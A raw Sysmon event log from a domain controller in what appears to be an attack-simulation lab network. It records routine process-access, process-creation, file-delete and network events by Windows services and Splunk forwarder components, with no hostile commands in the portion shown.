14:03:18.081{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202330Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8A6-6040-224E-00000000AD01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202329Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8A6-6040-224E-00000000AD01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202328Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-E8A6-6040-224E-00000000AD01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202362Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.880{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9A54F728326BD545D17A70C9C775C65,SHA256=AAD7A53F5A494F4CAD5FBFB9E4B5BB8DB253C491A6FE71D01E8B14EFC098852B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202361Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.539{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60625-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002202360Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.539{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60625-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 10341000x80000000000000002202359Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.487{5ABCFE62-E8A7-6040-244E-00000000AD01}71363940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202358Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.440{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19C0C9EB10E9986F4523099D95BDFE97,SHA256=A64EFC6BF4A864ECC526C327FF49F76C0869924EC5D765EB89DA2F31F2A36EEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202357Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8A7-6040-244E-00000000AD01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202356Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202355Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202354Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202353Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202352Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8A7-6040-244E-00000000AD01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202351Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8A7-6040-244E-00000000AD01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202350Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:19.362{5ABCFE62-E8A7-6040-244E-00000000AD01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002202365Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.545{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60626-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002202364Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.545{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60626-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002202363Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:20.459{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14464FE4BA2C95D7ABF2DAC36865850E,SHA256=06220EE1BD80D2B39B058C5234946DC2CF37C7DF4512D7431858C8B932C5BC9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202367Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:21.521{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79004789FC64BDCEC7344F2B6BF49C0F,SHA256=A797758F57AB35C0296C5C482116A768BB2B5CD7AF32E3A2494F4550C2A1E829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202366Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:21.209{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29127FFB6558D1E89165AF87FC1A628E,SHA256=93CAB955B672712D24089DBE49AD434712EBBB5FEFDB7E0EB416D3AE3A02AA66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202370Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:22.521{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1341BE3032530A3D105D6ABCF3E6B15D,SHA256=1F3DAF586050D06D8F3BB93AA17BBB8509C83FE3F89F75EB55075D8004612DE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202369Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:22.209{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=ADBDFA33A56E479DA45EF07FF2F466C0,SHA256=08ABB5EAAFCB4451CE236722676366910016C4623179064E11FD306CD1115867,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202368Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.998{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60627-false10.0.1.12-8000- 23542300x80000000000000002202371Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:23.537{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA44B2B5848AE2DCF0E56BD4DC2C79CE,SHA256=4C1C186A362042FB54B9284043EEFC834BF531B2BD41B95BA28124EFB23A5D89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202373Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:24.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAA5C914F4C15B861D8D3E749FF22F6,SHA256=E913F7EEE8F427E3FD6810ABAF4F4A81964A20B2A85AF17575B77ECB809031D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202372Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:24.552{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABD7D26CDAE432BA429E8EF6B421C64,SHA256=C872B5AE600906512421B3EB7D8BB0CD412830EB6DFFB8DA8FCC844270EC123F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202375Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:22.544{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53280- 23542300x80000000000000002202374Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:25.568{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A7DA76AB8A6B61EE130175B7B06610,SHA256=B4206D368A3AB8E433D72277A196EF98C63EDFF95C37A04C9D41FCCBC3437521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202377Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:26.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B0ED0125EFFDEC5DA6B512AD1A14134,SHA256=0D8C90B9E4D33D5FCF2384EF9DC2B2953368254E8A1B04CF2D20D8853382976E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202376Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:26.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10BB0074EDB1F55088A886149A854722,SHA256=70917DC80B98F214C9A628DF42AE287E52CCE3226E29B27C2AC164577408005A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202378Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:27.693{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AB4D333477DB5D0633E4F70C2E59B6F,SHA256=FE8A7A72AB61F1BDDDC021C0F73C377B7B92A60B48D6BEA6FC2BA096CA8A21AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202380Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:28.709{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A888E2B13AA63220580EBEDE0EA1AD90,SHA256=59F2F14432A37C939A1BAB61F00C003514F8ED940CC09E26EC307361890F34E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202379Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:23.014{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60628-false10.0.1.12-8000- 23542300x80000000000000002202381Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:29.740{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB4884A30A1C6AF44F90F3763F9A5F5,SHA256=2BED0D61FC7A126FE03EFF420687FC5FBFAE57547150954993F74A813CEEDF11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202382Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:30.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F17E32AF4CC0F8121E36B3512CCAA5C9,SHA256=A737DC20697253094409EE1F6D7C5E4DC08F937932F325B7DC2D91CFDC665EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202385Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:31.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE78A61B08D07DF8804BED8A198E5C4,SHA256=80DC7704D3175D36C11DCD6A25B982B4489679F59FF3D069FC7ABD9AB0481820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202384Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:31.334{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35E9CED2F3F568EC4807223396DD13F0,SHA256=F1E31AF6628F45FDE53BDD7FC7BA87B5815632E8D1BC5F8D4EDF29EBEF725B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202383Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:31.334{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B41D53ECFBC11E9A1E62D362084E290,SHA256=46612E7AFD0EED7CB136F2FE1AFC348CCD0B792AE8AEA740237530FB2FB2AC6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202388Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:32.834{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4EBA2EB674085BF4DEAF5550B4FE42B,SHA256=4E662146986CD3495118365D53DE868C5C333EE7A18CEFE2AD67ABE0698AE29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202387Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:32.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35E9CED2F3F568EC4807223396DD13F0,SHA256=F1E31AF6628F45FDE53BDD7FC7BA87B5815632E8D1BC5F8D4EDF29EBEF725B31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202386Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:28.014{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60629-false10.0.1.12-8000- 23542300x80000000000000002202389Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 